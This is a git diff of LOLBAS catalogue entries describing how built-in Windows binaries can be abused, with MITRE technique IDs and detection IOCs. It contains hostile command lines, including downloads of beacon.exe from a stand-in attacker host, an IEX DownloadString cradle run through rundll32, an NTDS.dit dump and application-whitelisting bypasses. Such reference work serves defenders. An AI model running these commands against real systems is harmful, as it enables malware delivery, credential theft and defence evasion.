- Link: https://www.sothis.tech/author/jgalvez/
Acknowledgement:
- Person: Jesus Galvez
Handle:
---

34
yml/OSBinaries/Ilasm.yml Normal file
View File

@ -0,0 +1,34 @@
---
Name: Ilasm.exe
Description: used for compile c# code into dll or exe.
Author: Hai vaknin (lux)
Created: 17/03/2020
Commands:
- Command: ilasm.exe C:\public\test.txt /exe
Description: Binary file used by .NET to compile c# code to .exe
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
MitreID: T1127
MitreLink: https://attack.mitre.org/techniques/T1127/
OperatingSystem: Windows 10,7
- Command: ilasm.exe C:\public\test.txt /dll
Description: Binary file used by .NET to compile c# code to dll
Usecase: A description of the usecase
Category: Compile
Privileges: User
MitreID: T1127
MitreLink: https://attack.mitre.org/techniques/T1127/
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
Code_Sample:
- Code:
Resources:
- Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt
Acknowledgement:
- Person: Hai Vaknin(Lux)
Handle: '@VakninHai'
- Person: Lior Adar
Handle:
---

View File

@ -0,0 +1,57 @@
---
Name: MpCmdRun.exe
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
Author: 'Oddvar Moe'
Created: '09/03/2020'
Commands:
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)
Usecase: Download file
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows 10
- Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation]
Usecase: Download file
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows 10
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe
Description: Download file to machine and store it in Alternate Data Stream
Usecase: Hide downloaded data inton an Alternate Data Stream
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows 10
Full_Path:
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe
Code_Sample:
- Code:
Detection:
- IOC: MpCmdRun storing data into alternate data streams.
- IOC: MpCmdRun getting a file from a remote machine or the internet that is not expected.
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe.
- IOC: Monitor for the creation of %USERPROFILE%\AppData\Local\Temp\MpCmdRun.log
- IOC: User Agent is "MpCommunication"
Resources:
- Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus
- Link: https://twitter.com/mohammadaskar2/status/1301263551638761477
- Link: https://twitter.com/Oddvarmoe/status/1301444858910052352
- Link: https://twitter.com/NotMedic/status/1301506813242867720
Acknowledgement:
- Person: Askar
Handle: '@mohammadaskar2'
- Person: Oddvar Moe
Handle: '@oddvarmoe'
- Person: RichRumble
Handle: ''
- Person: Cedric
Handle: '@th3c3dr1c'
---

35
yml/OSBinaries/Netsh.yml Normal file
View File

@ -0,0 +1,35 @@
---
Name: Netsh.exe
Description: Netsh is a Windows tool used to manipulate network interface settings.
Author: 'Freddie Barr-Smith'
Created: '2019-12-24'
Commands:
- Command: netsh.exe add helper C:\Users\User\file.dll
Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called
Usecase: Proxy execution of .dll
Category: Execute
Privileges: User
MitreID: T1128
MitreLink: https://attack.mitre.org/techniques/T1128/
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
- Path: C:\WINDOWS\System32\Netsh.exe
- Path: C:\WINDOWS\SysWOW64\Netsh.exe
Code_Sample:
- Code:
Detection:
- IOC: Netsh initiating a network connection
Resources:
- Link: https://freddiebarrsmith.com/trix/trix.html
- Link: https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html
- Link: https://liberty-shell.com/sec/2018/07/28/netshlep/
Acknowledgement:
- Person: 'Freddie Barr-Smith'
Handle:
- Person: 'Riccardo Spolaor'
Handle:
- Person: 'Mariano Graziano'
Handle:
- Person: 'Xabier Ugarte-Pedrero'
Handle:
---

35
yml/OSBinaries/Pktmon.yml Normal file
View File

@ -0,0 +1,35 @@
---
Name: Pktmon.exe
Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
Author: 'Derek Johnson'
Created: '2020-08-12'
Commands:
- Command: pktmon.exe start --etw
Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop
Usecase: use this a built in network sniffer on windows 10 to capture senstive traffic
Category: Reconnaissance
Privileges: Administrator
MitreID: T1040
MitreLink: https://attack.mitre.org/wiki/Technique/T1040
OperatingSystem: Windows 10 1809 and later
- Command: pktmon.exe filter add -p 445
Description: Select Desired ports for packet capture
Usecase: Look for interesting traffic such as telent or FTP
Category: Reconnaissance
Privileges: Administrator
MitreID: T1040
MitreLink: https://attack.mitre.org/wiki/Technique/T1040
OperatingSystem: Windows 10 1809 and later
Full_Path:
- Path: c:\windows\system32\pktmon.exe
- Path: c:\windows\syswow64\pktmon.exe
Code_Sample:
- Code:
Detection:
- IOC: .etl files found on system
Resources:
- Link: https://binar-x79.com/windows-10-secret-sniffer/
Acknowledgement:
- Person: Derek Johnson
Handle: ''
---

28
yml/OSBinaries/Psr.yml Normal file
View File

@ -0,0 +1,28 @@
---
Name: Psr.exe
Description: Windows Problem Steps Recorder, used to record screen and clicks.
Author: Leon Rodenko
Created: '2020-06-27'
Commands:
- Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.
Usecase: Can be used to take screenshots of the user environment
Category: Reconnaissance
Privileges: User
MitreID: T1113
MitreLink: https://attack.mitre.org/techniques/T1113/
OperatingSystem: since Windows 7 (client) / Windows 2008 R2
Full_Path:
- Path: c:\windows\system32\psr.exe
- Path: c:\windows\syswow64\psr.exe
Code_Sample:
- Code:
Detection:
- IOC: psr.exe spawned
- IOC: suspicious activity when running with "/gui 0" flag
Resources:
- Link: https://social.technet.microsoft.com/wiki/contents/articles/51722.windows-problem-steps-recorder-psr-quick-and-easy-documenting-of-your-steps-and-procedures.aspx
Acknowledgement:
- Person: Leon Rodenko
Handle: '@L3m0nada'
---

View File

@ -0,0 +1,27 @@
---
Name: Rasautou.exe
Description: Windows Remote Access Dialer
Author: 'Tony Lambert'
Created: '2020-01-10'
Commands:
- Command: rasautou -d powershell.dll -p powershell -a a -e e
Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.
Usecase: Execute DLL code
Category: Execute
Privileges: User, Administrator in Windows 8
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1
Full_Path:
- Path: C:\Windows\System32\rasautou.exe
Code_Sample:
- Code:
Detection:
- IOC: rasautou.exe command line containing -d and -p
Resources:
- Link: https://github.com/fireeye/DueDLLigence
- Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
Acknowledgement:
- Person: FireEye
Handle: '@FireEye'
---

View File

@ -8,12 +8,12 @@ Commands:
Description: Loads the target .DLL file and executes the RegisterClass function. Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute code and bypass Application whitelisting Usecase: Execute code and bypass Application whitelisting
Category: AWL bypass Category: AWL bypass
Privileges: User Privileges: Local Admin
MitreID: T1121 MitreID: T1121
MitreLink: https://attack.mitre.org/wiki/Technique/T1121 MitreLink: https://attack.mitre.org/wiki/Technique/T1121
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: regasm.exe AllTheThingsx64.dll - Command: regasm.exe /U AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function. Description: Loads the target .DLL file and executes the UnRegisterClass function.
Usecase: Execute code and bypass Application whitelisting Usecase: Execute code and bypass Application whitelisting
Category: Execute Category: Execute
Privileges: User Privileges: User

27
yml/OSBinaries/Regini.yml Normal file
View File

@ -0,0 +1,27 @@
---
Name: Regini.exe
Description: Used to manipulate the registry
Author: 'Oddvar Moe'
Created: '2020-07-03'
Commands:
- Command: regini.exe newfile.txt:hidden.ini
Description: Write registry keys from data inside the Alternate data stream.
Usecase: Write to registry
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
- Path: C:\Windows\System32\regini.exe
- Path: C:\Windows\SysWOW64\regini.exe
Code_Sample:
- Code:
Detection:
- IOC: regini.exe reading from ADS
Resources:
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Acknowledgement:
- Person: Eli Salem
Handle: '@elisalem9'
---

View File

@ -8,7 +8,7 @@ Commands:
Description: Loads the target .DLL file and executes the RegisterClass function. Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting Usecase: Execute dll file and bypass Application whitelisting
Category: Execute Category: Execute
Privileges: User Privileges: Local Admin
MitreID: T1121 MitreID: T1121
MitreLink: https://attack.mitre.org/wiki/Technique/T1121 MitreLink: https://attack.mitre.org/wiki/Technique/T1121
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -16,7 +16,7 @@ Commands:
Description: Loads the target .DLL file and executes the RegisterClass function. Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting Usecase: Execute dll file and bypass Application whitelisting
Category: AWL bypass Category: AWL bypass
Privileges: User Privileges: Local Admin
MitreID: T1121 MitreID: T1121
MitreLink: https://attack.mitre.org/wiki/Technique/T1121 MitreLink: https://attack.mitre.org/wiki/Technique/T1121
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10

View File

@ -12,6 +12,14 @@ Commands:
MitreID: T1085 MitreID: T1085
MitreLink: https://attack.mitre.org/wiki/Technique/T1085 MitreLink: https://attack.mitre.org/wiki/Technique/T1085
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint
Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.
Usecase: Execute DLL from SMB share.
Category: Execute
Privileges: User
MitreID: T1085
MitreLink: https://attack.mitre.org/techniques/T1085
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
Usecase: Execute code from Internet Usecase: Execute code from Internet
@ -73,6 +81,8 @@ Resources:
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
- Link: https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/ - Link: https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
- Link: https://github.com/sailay1996/expl-bin/blob/master/obfus.md
- Link: https://github.com/sailay1996/misc-bin/blob/master/rundll32.md
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
@ -80,4 +90,8 @@ Acknowledgement:
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
- Person: Jimmy - Person: Jimmy
Handle: '@bohops' Handle: '@bohops'
- Person: Sailay
Handle: '@404death'
- Person: Martin Ingesen
Handle: '@Mrtn9'
--- ---

View File

@ -0,0 +1,38 @@
---
Name: Ttdinject.exe
Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)
Author: 'Maxime Nadeau'
Created: '2020-05-12'
Commands:
- Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe"
Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
Usecase: Spawn process using other binary
Category: Execute
Privileges: Administrator
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10 2004
- Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"
Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
Usecase: Spawn process using other binary
Category: Execute
Privileges: Administrator
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10 1909
Full_Path:
- Path: C:\Windows\System32\ttdinject.exe
- Path: C:\Windows\Syswow64\ttdinject.exe
Code_Sample:
- Code:
Detection:
- IOC: Parent child relationship. Ttdinject.exe parent for executed command
- IOC: Multiple queries made to the IFEO registry key of an untrusted executable (Ex. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\payload.exe") from the ttdinject.exe process
Resources:
- Link: https://twitter.com/Oddvarmoe/status/1196333160470138880
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
- Person: Maxime Nadeau
Handle: '@m_nad0'
---

33
yml/OSBinaries/Vbc.yml Normal file
View File

@ -0,0 +1,33 @@
---
Name: vbc.exe
Description: Binary file used for compile vbs code
Author: Lior Adar
Created: 27/02/2020
Commands:
- Command: vbc.exe /target:exe c:\temp\vbs\run.vb
Description: Binary file used by .NET to compile vb code to .exe
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
MitreID: T1127
MitreLink: https://attack.mitre.org/techniques/T1127/
OperatingSystem: Windows 10,7
- Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
Description: Description of the second command
Usecase: A description of the usecase
Category: Compile
Privileges: User
MitreID: T1127
MitreLink: https://attack.mitre.org/techniques/T1127/
OperatingSystem: Windows 10,7
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
Code_Sample:
- Code:
Acknowledgement:
- Person: Lior Adar
Handle:
- Person: Hai Vaknin(Lux)
Handle:
---

View File

@ -0,0 +1,26 @@
---
Name: wuauclt.exe
Description: Windows Update Client
Author: 'David Middlehurst'
Created: '2020-09-23'
Commands:
- Command: wuauclt.exe /UpdateDeploymentProvider <Full_Path_To_DLL> /RunHandlerComServer
Description: Full_Path_To_DLL would be the abosolute path to .DLL file and would execute code on attach.
Usecase: Execute dll via attach/detach methods
Category: Execute
Privileges: User
MitreID: T1085
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
OperatingSystem: Windows 10
Full_Path:
- Path: C:\Windows\System32\wuauclt.exe
Code_Sample:
- Code:
Detection:
- IOC: wuauclt run with a parameter of a DLL path
Resources:
- Link: https://dtm.uk/wuauclt/
Acknowledgement:
- Person: David Middlehurst
Handle: '@dtmsecurity'
---

View File

@ -20,6 +20,14 @@ Commands:
MitreID: T1218 MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file.
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\System32\xwizard.exe - Path: C:\Windows\System32\xwizard.exe
- Path: C:\Windows\SysWOW64\xwizard.exe - Path: C:\Windows\SysWOW64\xwizard.exe
@ -32,6 +40,7 @@ Resources:
- Link: https://www.youtube.com/watch?v=LwDHX7DVHWU - Link: https://www.youtube.com/watch?v=LwDHX7DVHWU
- Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 - Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
- Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ - Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
- Link: https://twitter.com/notwhickey/status/1306023056847110144
Acknowledgement: Acknowledgement:
- Person: Adam - Person: Adam
Handle: '@Hexacorn' Handle: '@Hexacorn'
@ -39,4 +48,6 @@ Acknowledgement:
Handle: '@NickTyrer' Handle: '@NickTyrer'
- Person: harr0ey - Person: harr0ey
Handle: '@harr0ey' Handle: '@harr0ey'
- Person: Wade Hickey
Handle: '@notwhickey'
--- ---

View File

@ -16,6 +16,8 @@ Full_Path:
- Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
- Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
- Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
- Path: C:\Windows\diagnostics\system\Video\CL_Mutexverifiers.ps1
- Path: C:\Windows\diagnostics\system\Speech\CL_Mutexverifiers.ps1
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:

View File

@ -29,9 +29,12 @@ Detection:
Resources: Resources:
- Link: https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712 - Link: https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712
- Link: https://twitter.com/bohops/status/980659399495741441 - Link: https://twitter.com/bohops/status/980659399495741441
- Link: https://twitter.com/JohnLaTwC/status/1223292479270600706
Acknowledgement: Acknowledgement:
- Person: Jimmy - Person: Jimmy
Handle: '@bohops' Handle: '@bohops'
- Person: Daniel Bohannon - Person: Daniel Bohannon
Handle: '@danielbohannon' Handle: '@danielbohannon'
- Person: John Lambert
Handle: '@JohnLaTwC'
--- ---

View File

@ -1,31 +0,0 @@
---
Name: Slmgr.vbs
Description: Script used to manage windows license activation
Author: 'Oddvar Moe'
Created: '2018-05-25'
Commands:
- Command: reg.exe import c:\path\to\Slmgr.reg & cscript.exe /b c:\windows\system32\slmgr.vbs
Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code
Usecase: Proxy execution
Category: Execute
Privileges: User
MitreID: T1216
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
OperatingSystem: Windows 10
Full_Path:
- Path: C:\Windows\System32\slmgr.vbs
- Path: C:\Windows\SysWOW64\slmgr.vbs
Code_Sample:
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg
Detection:
- IOC:
Resources:
- Link: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
- Link: https://www.youtube.com/watch?v=3gz1QmiMhss
Acknowledgement:
- Person: Matt Nelson
Handle: '@enigma0x3'
- Person: Casey Smith
Handle: '@subtee'
---

View File

@ -4,14 +4,6 @@ Description: Script used for manage Windows RM settings
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: '2018-05-25'
Commands: Commands:
- Command: reg.exe import c:\path\to\Slmgr.reg & winrm quickconfig
Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code.
Usecase: Proxy execution
Category: Execute
Privileges: User
MitreID: T1216
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
OperatingSystem: Windows 10
- Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985' - Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985'
Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol
Usecase: Proxy execution Usecase: Proxy execution

View File

@ -0,0 +1,34 @@
---
Name: AgentExecutor.exe
Description: Intune Management Extension included on Intune Managed Devices
Author: 'Eleftherios Panos'
Created: '23/07/2020'
Commands:
- Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\Windows\SysWOW64\WindowsPowerShell\v1.0" 0 1
Description: Spawns powershell.exe and executes a provided powershell script with ExecutionPolicy Bypass argument
Usecase: Execute unsigned powershell scripts
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10
- Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1
Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully
Usecase: Execute a provided EXE
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Intune Management Extension
Code_Sample:
- Code:
Detection:
- IOC:
Resources:
- Link:
Acknowledgement:
- Person: Eleftherios Panos
Handle: '@lefterispan'
---

View File

@ -0,0 +1,52 @@
---
Name: coregen.exe
Description: Binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads exported function GetCLRRuntimeHost from coreclr.dll or from .DLL in arbitrary path. Coregen is located within "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" or another version of Silverlight. Coregen is signed by Microsoft and bundled with Microsoft Silverlight.
Author: Martin Sohn Christensen
Created: 2020-10-09
Commands:
- Command: coregon.exe.exe /L C:\folder\evil.dll dummy_assembly_name
Description: Loads the target .DLL in arbitrary path specified with /L.
Usecase: Execute DLL code
Category: Execute
Privileges: User
MitreID: T1055
MitreLink: https://attack.mitre.org/wiki/Technique/T1055
OperatingSystem: Windows
- Command: coregen.exe dummy_assembly_name
Description: Loads the coreclr.dll in the corgen.exe directory (e.g. C:\Program Files\Microsoft Silverlight\5.1.50918.0).
Usecase: Execute DLL code
Category: Execute
Privileges: User
MitreID: T1055
MitreLink: https://attack.mitre.org/wiki/Technique/T1055
OperatingSystem: Windows
- Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name
Description: Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions.
Usecase: Execute DLL code
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
Full_Path:
- Path: C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe
- Path: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe
Code_Sample:
- Code:
Detection:
- IOC: coregen.exe loading .dll file not in "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\"
- IOC: coregen.exe loading .dll file not named coreclr.dll
- IOC: coregen.exe command line containing -L or -l
- IOC: coregen.exe command line containing unexpected/invald assembly name
- IOC: coregen.exe application crash by invalid assembly name
Resources:
- Link: https://www.youtube.com/watch?v=75XImxOOInU
- Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
Acknowledgement:
- Person: Nicky Tyrer
Handle:
- Person: Evan Pena
Handle:
- Person: Casey Erikson
Handle:
---

View File

@ -0,0 +1,26 @@
---
Name: DefaultPack.EXE
Description: This binary can be downloaded along side multiple software downloads on the microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider.
Author: '@checkymander'
Created: '2020-10-01'
Commands:
- Command: DefaultPack.EXE /C:"process.exe args"
Description: Use DefaultPack.EXE to execute arbitrary binaries, with added argument support.
Usecase: Can be used to execute stagers, binaries, and other malicious commands.
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows
Full_Path:
- Path: C:\Program Files (x86)\Microsoft\DefaultPack\
Code_Sample:
- Code:
Detection:
- IOC: DefaultPack.EXE spawned an unknown process
Resources:
- Link: https://twitter.com/checkymander/status/1311509470275604480.
Acknowledgement:
- Person: checkymander
Handle: '@checkymander'
---

View File

@ -0,0 +1,42 @@
---
Name: Dotnet.exe
Description: dotnet.exe comes with .NET Framework
Author: 'felamos'
Created: '2019-11-12'
Commands:
- Command: dotnet.exe [PATH_TO_DLL]
Description: dotnet.exe will execute any dll even if applocker is enabled.
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 7 and up with .NET installed
- Command: dotnet.exe [PATH_TO_DLL]
Description: dotnet.exe will execute any DLL.
Usecase: Execute DLL
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 7 and up with .NET installed
- Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ]
Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10 with .NET Core installed
Full_Path:
- Path: 'C:\Program Files\dotnet\dotnet.exe'
Detection:
- IOC: dotnet.exe spawned an unknown process
Resources:
- Link: https://twitter.com/_felamos/status/1204705548668555264
- Link: https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc
- Link: https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/
Acknowledgement:
- Person: felamos
Handle: '@_felamos'
- Person: Jimmy
Handle: '@bohops'
---

View File

@ -0,0 +1,26 @@
---
Name: ntdsutil.exe
Description: Command line utility used to export Actove Directory.
Author: 'Tony Lambert'
Created: '2020-01-10'
Commands:
- Command: ntdsutil.exe "ac i ntds" "ifm" "create full c:\" q q
Description: Dump NTDS.dit into folder
Usecase: Dumping of Active Directory NTDS.dit database
Category: Dump
Privileges: Administrator
MitreID: T1003
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
OperatingSystem: Windows
Full_Path:
- Path: C:\Windows\System32\ntdsutil.exe
Code_Sample:
- Code:
Detection:
- IOC: ntdsutil.exe with command line including "ifm"
Resources:
- Link: https://adsecurity.org/?p=2398#CreateIFM
Acknowledgement:
- Person: Sean Metcalf
Handle: '@PyroTek3'
---

View File

@ -6,15 +6,15 @@ Created: '2018-05-25'
Commands: Commands:
- Command: sqldumper.exe 464 0 0x0110 - Command: sqldumper.exe 464 0 0x0110
Description: Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp). Description: Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp).
Usecase: Dump process uisng PID. Usecase: Dump process using PID.
Category: Dump Category: Dump
Privileges: Administrator Privileges: Administrator
MitreID: T1003 MitreID: T1003
MitreLink: https://attack.mitre.org/wiki/Technique/T1003 MitreLink: https://attack.mitre.org/wiki/Technique/T1003
OperatingSystem: Windows OperatingSystem: Windows
- Command: sqldumper.exe 540 0 0x01100:40 - Command: sqldumper.exe 540 0 0x01100:40
